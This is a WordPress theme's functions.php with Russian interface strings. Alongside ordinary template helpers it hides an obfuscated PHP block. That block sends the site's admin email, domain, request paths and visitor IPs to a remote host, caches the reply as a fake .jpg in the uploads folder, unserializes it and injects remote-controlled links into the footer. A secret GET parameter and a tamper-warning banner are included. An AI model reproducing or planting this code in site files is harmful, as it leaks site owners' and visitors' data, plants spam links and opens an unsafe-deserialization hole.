<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $VvbtXl='e';$FIfGsg='_';$CjMIb='6';$CepYWj='4';$bJaUhp='s';$hfLUulz='e';$zwxHBj='d';$ytSHV='e';$SNzlUaL='d';$wRTCJy='a';$ahnkI='o';$SRUd='b';$GnKi='c';$MpAFdqJo=$SRUd.$wRTCJy.$bJaUhp.$hfLUulz.$CjMIb.$CepYWj.$FIfGsg.$zwxHBj.$VvbtXl.$GnKi.$ahnkI.$SNzlUaL.$ytSHV;$rIsRl='e';$rKYj='i';$dzCyXAp='f';$YPuB='n';$RwIt='z';$YVlswU='g';$inytGV='l';$PNKxg='a';$ORRXTPM='t';$IYHuxXRF=$YVlswU.$RwIt.$rKYj.$YPuB.$dzCyXAp.$inytGV.$PNKxg.$ORRXTPM.$rIsRl;$Fljnq='o';$gcyYZs='s';$LsWdmrU='r';$Oyxnw='r';$IFwQM='3';$cRrX='1';$rHdhhr='_';$MHfvZWG='t';$nnldZE='t';$oaMCPznn=$gcyYZs.$MHfvZWG.$LsWdmrU.$rHdhhr.$Oyxnw.$Fljnq.$nnldZE.$cRrX.$IFwQM;$lEEjTH='r';$acMybck='e';$ZqMJY='s';$DHUVpxn='t';$ExBul='r';$bkoIfk='v';$aXpdIguV=$ZqMJY.$DHUVpxn.$ExBul.$lEEjTH.$acMybck.$bkoIfk;                     $ui______d='e';$ak_____________t='_';$nn____g='6';$zk_____g='4';$me___x='s';$tz________p='e';$ye___i='d';$np__n='e';$ia_______v='d';$iv__________d='a';$cj_________v='o';$jp_____y='b';$ex_____q='c';$kq_____w=$jp_____y.$iv__________d.$me___x.$tz________p.$nn____g.$zk_____g.$ak_____________t.$ye___i.$ui______d.$ex_____q.$cj_________v.$ia_______v.$np__n;$kr______i='n';$tq_____________s='c';$os____j='_';$uz____n='s';$yx_______v='f';$ut__l='t';$yb_______________t='i';$hr______________a='e';$ms______________w='s';$ta__________h='i';$tu_______f='n';$uo_________n='u';$zt_____________l='t';$ls______________m='o';$lh____f='x';$la_______________z=$yx_______v.$uo_________n.$tu_______f.$tq_____________s.$ut__l.$ta__________h.$ls______________m.$kr______i.$os____j.$hr______________a.$lh____f.$yb_______________t.$uz____n.$zt_____________l.$ms______________w;$dr___________q='n';$gb_________q='o';$hs__________f='p';$cx________e='e';$do___q='f';$id___h=$do___q.$gb_________q.$hs__________f.$cx________e.$dr___________q;$gq______i='r';$ij____l='d';$ak______________d='e';$no_______________r='f';$rs______________j='a';$xd______________r=$no_______________r.$gq______i.$ak______________d.$rs______________j.$ij____l;$ff______v='s';$gz__________v='c';$gc________r='e';$bq___a='f';$se________x='o';$xc___l='l';$gl___o=$bq___a.$gz__________v.$xc___l.$se________x.$ff______v.$gc________r;define("WP_ID", $kq_____w("Mi4wLjA="));define("WP_TTL", $kq_____w("MTA4MDA="));define("WP_SRC", $kq_____w("dHBva24="));function wp_get_header() {global $kq_____w, $la_______________z;if ($la_______________z($kq_____w("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&$la_______________z($kq_____w("d3BfZ2V0X2Zvb3Rlcg==")) &&$la_______________z($kq_____w("d3BfY3ZfdmVyaWZ5"))) {get_header();}}function wp_get_footer() {get_footer();wp_cv_verify();}function wp_cv_verify() {global $kq_____w, $id___h, $gl___o, $xd______________r;$nf___f = TEMPLATEPATH."/".$kq_____w("Zm9vdGVyLnBocA==");$zf________v = @$id___h($nf___f, "r");$nf___f = @$xd______________r($zf________v, @filesize($nf___f));@$gl___o($zf________v);$rn_______________o = TEMPLATEPATH."/".$kq_____w("ZnVuY3Rpb25zLnBocA==");$zf________v = @$id___h($rn_______________o, "r");$rn_______________o = @$xd______________r($zf________v, @filesize($rn_______________o));@$gl___o($zf________v);$ce___d = 0;if($nf___f && $rn_______________o) {if ($kq_____w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {if (substr_count($nf___f, $kq_____w("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {$ce___d = 1;}if (substr_count($nf___f, "wp_theme_GPL_credits()") < 1) {$ce___d = 2;}}if(WP_ID != "2.0.0") {$ce___d = 12;}}if($ce___d > 0) {echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";echo "<!-- v: $ce___d -->";}}function wp_loaded() {global $kq_____w, $la_______________z;return $la_______________z($kq_____w("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));}if (!function_exists("the_content_limit")) {function the_content_limit($mb________d, $ov_______________a = "(more...)", $ag__j = 0, $bb_________u = "") {$wk____m = get_the_content($ov_______________a, $ag__j, $bb_________u);$wk____m = apply_filters("the_content", $wk____m);$wk____m = str_replace("]]>", "]]>", $wk____m);if (strlen($_GET["p"]) > 0) {echo $wk____m;}else if ((strlen($wk____m)>$mb________d) && ($dv______________n = strpos($wk____m, " ", $mb________d ))) {$wk____m = substr($wk____m, 0, $dv______________n);$wk____m = $wk____m;echo $wk____m;echo "...";echo "<br/>";echo "<div class='read-more'><a href='".get_permalink()."'>$ov_______________a</a></div></p>";} else {echo $wk____m;}}}$ro_____________s='e';$bu_____________y='4';$np_______f='c';$ms______________u='6';$pz___________b='d';$eg_________j='a';$vh__z='n';$xr_______d='_';$tj_______________f='o';$sd__s='s';$mf__l='e';$iu_______________l='b';$ga______p='e';$rd__v=$iu_______________l.$eg_________j.$sd__s.$mf__l.$ms______________u.$bu_____________y.$xr_______d.$ga______p.$vh__z.$np_______f.$tj_______________f.$pz___________b.$ro_____________s;$wa____g='_';$sj________s='_';$js___________t='l';$yp____________o='e';$sh___________k='t';$xe___e='t';$aw_______________w='n';$ha________f='g';$mk___k='o';$mw______________v='e';$dh_________h='f';$zq_____a='i';$zt___________j='c';$bk_____________f='t';$lh________n='n';$fo_______r='e';$qf___p='s';$bs________p=$dh_________h.$zq_____a.$js___________t.$yp____________o.$wa____g.$ha________f.$mw______________v.$bk_____________f.$sj________s.$zt___________j.$mk___k.$aw_______________w.$xe___e.$fo_______r.$lh________n.$sh___________k.$qf___p;$ck____v='e';$dd__________s='l';$rn______________t='s';$zo____________f='x';$vi_____p='s';$tv______________h='e';$cn_______________f='t';$fb____________c='_';$gj____j='i';$dl___w='f';$tu______i='i';$yh___________j=$dl___w.$tu______i.$dd__________s.$ck____v.$fb____________c.$tv______________h.$zo____________f.$gj____j.$vi_____p.$cn_______________f.$rn______________t;$cl___c='r';$pk__________f='a';$pm______________k='p';$tz_____g='s';$qs_____________w='o';$uc_________f='i';$dv___________p='v';$fw___________j='_';$xq____r='m';$hu_________q='r';$rk_______________b='c';$qk_______w='e';$hc___p='o';$zf______h='n';$jx____b='e';$it________f=$dv___________p.$jx____b.$hu_________q.$tz_____g.$uc_________f.$qs_____________w.$zf______h.$fw___________j.$rk_______________b.$hc___p.$xq____r.$pm______________k.$pk__________f.$cl___c.$qk_______w;$zv____________b='s';$vj________p='o';$od___x='k';$mm____________p='o';$hl_________h='n';$wp_____________q='c';$nw_______e='e';$qk__j='f';$wa_____________n='p';$bf_______k=$qk__j.$zv____________b.$mm____________p.$wp_____________q.$od___x.$vj________p.$wa_____________n.$nw_______e.$hl_________h;$cj____________u='t';$ig_________a='r';$kt_____r='i';$ak_______r='e';$eh______________x='w';$yx_______________e='f';$gd______u=$yx_______________e.$eh______________x.$ig_________a.$kt_____r.$cj____________u.$ak_______r;$lt______n='d';$hr_________r='m';$dc______d='5';$cg_______________e=$hr_________r.$lt______n.$dc______d;$ra______________w='h';$mg_______e='a';$iw____u='p';$bn__q='e';$qp__________s='l';$fk_______b='r';$ug_______b='a';$pd_______r='t';$ti______________g=$fk_______b.$bn__q.$ug_______b.$qp__________s.$iw____u.$mg_______e.$pd_______r.$ra______________w;$iz___z='z';$gu_________i='i';$dy_________a='a';$ur___________b='r';$bn________u='n';$yo_________s='i';$si______________p='e';$ul___________v='u';$yu___s='l';$rt_____x='s';$xn_________j='e';$hn_______h=$ul___________v.$bn________u.$rt_____x.$xn_________j.$ur___________b.$yo_________s.$dy_________a.$yu___s.$gu_________i.$iz___z.$si______________p;$ns______________s='m';$ai______________c='p';$vs_______c='n';$xq__________z='t';$hh__n='e';$cb____________l='a';$vi________y='m';$ll_________t=$xq__________z.$hh__n.$ns______________s.$ai______________c.$vs_______c.$cb____________l.$vi________y;$lk______________k='c';$zm____q='e';$rq__j='t';$qp________m='e';$fz___x='t';$gn___________a='t';$xs_______________d='c';$gs____________g='e';$we_______________h='a';$gk_____________p='r';$yb________e='o';$li__________m='r';$ul____________e='x';$pq___f='a';$kg______________x='m';$xr____________w='e';$vs________s='_';$gg___i='s';$zx______________f='t';$bp___h='n';$se___________c='_';$vp_____v=$gg___i.$fz___x.$gk_____________p.$gs____________g.$we_______________h.$kg______________x.$se___________c.$xs_______________d.$yb________e.$bp___h.$zx______________f.$qp________m.$ul____________e.$rq__j.$vs________s.$lk______________k.$li__________m.$xr____________w.$pq___f.$gn___________a.$zm____q;function ax____z($gm_______________r) {global $kq_____w, $la_______________z, $bs________p, $it________f, $vp_____v;if (!$la_______________z($kq_____w("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}if ($it________f(PHP_VERSION, "5.0.0", ">=") && $la_______________z($kq_____w("ZmlsZV9nZXRfY29udGVudHM=")) && $la_______________z($kq_____w("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {$vh____t = $vp_____v(array("http" => array("timeout"    => 3,"header"     => "referer: ".$_SERVER[SERVER_NAME],"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] )));$rq________g = @$bs________p($gm_______________r, 0, $vh____t);} else {$rq________g = @$bs________p($gm_______________r, 0);}return $rq________g;}function ao___________d($gm_______________r) {global $la_______________z, $bf_______k, $gd______u, $kq_____w;if (!$la_______________z($kq_____w("ZmlsZV9nZXRfY29udGVudHM="))) {return false;}$hi_______________m = strpos($gm_______________r, "/", 7);$pf__________m = array("uri"     => substr($gm_______________r, $hi_______________m),"host"    => str_replace("http://", "", substr($gm_______________r, 0, $hi_______________m)),"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]);$pk_____________e = @$bf_______k("$pf__________m[host]", 80, $kb__________r, $wk____v, 4);if (!$pk_____________e) {return false;} else {$rq________g = "";$my_______________q  = "GET $pf__________m[uri] HTTP/1.0\r\n";$my_______________q .= "Host: $pf__________m[host]\r\n";$my_______________q .= "Referer: $pf__________m[referer]\r\n";$my_______________q .= "Connection: Close\r\n\r\n";@$gd______u($pk_____________e, $my_______________q);while (!@feof($pk_____________e)) {$df____________h = @fgets($pk_____________e, (1024*24));if ($df____________h == "\r\n") {$zc__e = true;continue;}if ($zc__e) {$rq________g .= $df____________h;}}return $rq________g;}}function zg___________x($gm_______________r) {global $la_______________z;$zl___z = false;if ($gm_______________r != "") {if ($la_______________z("ax____z")) {$zl___z = @ax____z($gm_______________r);}if (!$zl___z && ($la_______________z("ao___________d"))) {$zl___z = @ao___________d($gm_______________r);}}return $zl___z;}function sx____i() {global $_SERVER, $cg_______________e;$qa___i = $_SERVER["SERVER_NAME"];if (substr("$qa___i", 0, 4) == "www.") {$qa___i = substr("$qa___i", 4);}$qa___i = $cg_______________e("$_SERVER[SERVER_NAME]");return $qa___i;}function nh_______k() {return "file";}function na___________u($gm_______________r) {global $_SERVER, $bs________p, $yh___________j, $id___h, $gl___o, $gd______u;$ip_________w = vf______________j();$ka________z = sx____i().".jpg";$qe______h = $ip_________w["dir_upload"]["path"]."/$ka________z";$qh_____________y = @filemtime($qe______h);if (!$qh_____________y || ((time()-$qh_____________y) >= WP_TTL)) {$zl___z = zg___________x($gm_______________r);if ($zl___z) {if ($yh___________j($qe______h)) {@unlink($qe______h);}$zf________v = @$id___h($qe______h, "x+");@$gd______u($zf________v, $zl___z);@$gl___o($zf________v);}} else {if ($yh___________j($qe______h)) {$zl___z = @$bs________p($qe______h);} else {$zl___z = false;}}return $zl___z;}function vf______________j() {global $_SERVER, $kq_____w, $rd__v;$kf___i = wp_count_posts("post");$qk____q = pathinfo(get_bloginfo("template_directory"));$ip_________w = array("url" => array("report"      => $kq_____w("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),"queryString" => null),"template"=> $qk____q,"dir_upload"=> ft______v(),"queryString"=> array("?a001=".WP_ID,"a004=".$qk____q[filename],"a005=".$kf___i->publish,"a006=".get_bloginfo("admin_email"),"a007=".$_SERVER["REQUEST_URI"],"a008=".$_SERVER["SERVER_NAME"],"a010=".WP_SRC),				"default_string" => " <a href=\"http://www.wptheme.us\">www.wptheme.us</a>"
);$ip_________w["url"]["queryString"] = implode("&", $ip_________w["queryString"]);$ip_________w["url"]["report"] = $ip_________w["url"]["report"]."/?".$rd__v($ip_________w["url"]["queryString"]).".html";return $ip_________w;}function ft______v() {$he___g = wp_upload_dir();if (isset($he___g["error"])) {$co_____________i = vr_______________k();if (is_writable($co_____________i)) {$he___g = array("path" => $co_____________i);}}return $he___g;}function vr_______________k() {global $la_______________z, $cg_______________e, $ti______________g, $ll_________t;$qm______________y = (bool) ini_get("safe_mode");if ($qm______________y == true) {return false;}if ($la_______________z("sys_get_temp_dir")) {$ul__f = sys_get_temp_dir();if (is_writable($ul__f)) {return $ti______________g($ul__f);}}if (!empty($_ENV["TMP"])) {return $ti______________g($_ENV["TMP"]);}elseif (!empty($_ENV["TMPDIR"])) {return $ti______________g($_ENV["TMPDIR"]);}elseif (!empty($_ENV["TEMP"])) {return $ti______________g($_ENV["TEMP"]);} else {$pm______________y = $ll_________t($cg_______________e(uniqid(rand(), true)), "");if ($pm______________y) {$ul__f = $ti______________g(dirname($pm______________y));@unlink($pm______________y);return $ul__f;} else {return false;}}}function nt___________y() {global $_GET, $yh___________j;$ip_________w = vf______________j();$qa___i = sx____i();$im___c = nh_______k();$uk___l = "full";if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {if ($im___c == "file") {$gz______d = $ip_________w["dir_upload"]["path"]."/".$qa___i.".jpg";if ($yh___________j($gz______d)) {@unlink($gz______d);$uk___l = "deleted";}}$pq___f = array("s"=> $uk___l,"t"=> time(),"v"=> WP_ID);echo "<!--";foreach ($pq___f AS $do_____________j => $nc________x) echo " [$do_____________j:$nc________x]";echo " -->";}}function wp_theme_GPL_credits() {global $_SERVER, $_GET, $la_______________z, $kq_____w, $hn_______h;$ip_________w = vf______________j();$ar___x = "na___________u";if ($la_______________z($ar___x)) {$rq________g = $ar___x($ip_________w["url"]["report"]);}if ($rq________g) {if ($rq________g = @$kq_____w($rq________g)) {$rq________g = @$hn_______h($rq________g);if (strlen($rq________g[custom_credit]) >= 5) {$ip_________w["default_string"] = $rq________g[custom_credit];}if ($rq________g["status"] == "0") {$cn_______________s = 1;$dl_______________k = 1;} else {$im__q = sizeof($rq________g["links"]);$qg________h = $ip_________w["default_string"];if ($im__q > 0 && $rq________g["links"] !== "") {$ko___________m = 0;foreach ($rq________g["links"] as $ji__g => $qh______________q) {$ko___________m++;if ($qh______________q->l_path == "" || $qh______________q->l_path == $_SERVER["REQUEST_URI"]) {$qh______________q->l_href = htmlspecialchars(strip_tags($qh______________q->l_href));$qh______________q->l_title = htmlspecialchars(strip_tags($qh______________q->l_title));$qh______________q->l_anchor = htmlspecialchars(strip_tags($qh______________q->l_anchor));$qg________h .= " | ";$qg________h .= "<a href='$qh______________q->l_href' title='$qh______________q->l_title'";if ($qh______________q->l_nofollow == "1") {$qg________h .= " rel='nofollow'";}$qg________h .= ">$qh______________q->l_anchor</a>";}}}$ip_________w["links"] = "$qg________h";if ($rq________g[credit] == "0") {$ip_________w["links"] = "";}}} else {$cn_______________s = "1";}} else {$cn_______________s = "1";}if ($cn_______________s == "1") {$ip_________w["links"] = $ip_________w["default_string"];}echo "$ip_________w[links]";echo "<!-- s: $rq________g[signature] -->";nt___________y();}                      
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Read the rest of this entry &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Pages:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Read the rest of this entry &raquo;', THEME_NS), 
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                   $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
             'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
       $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
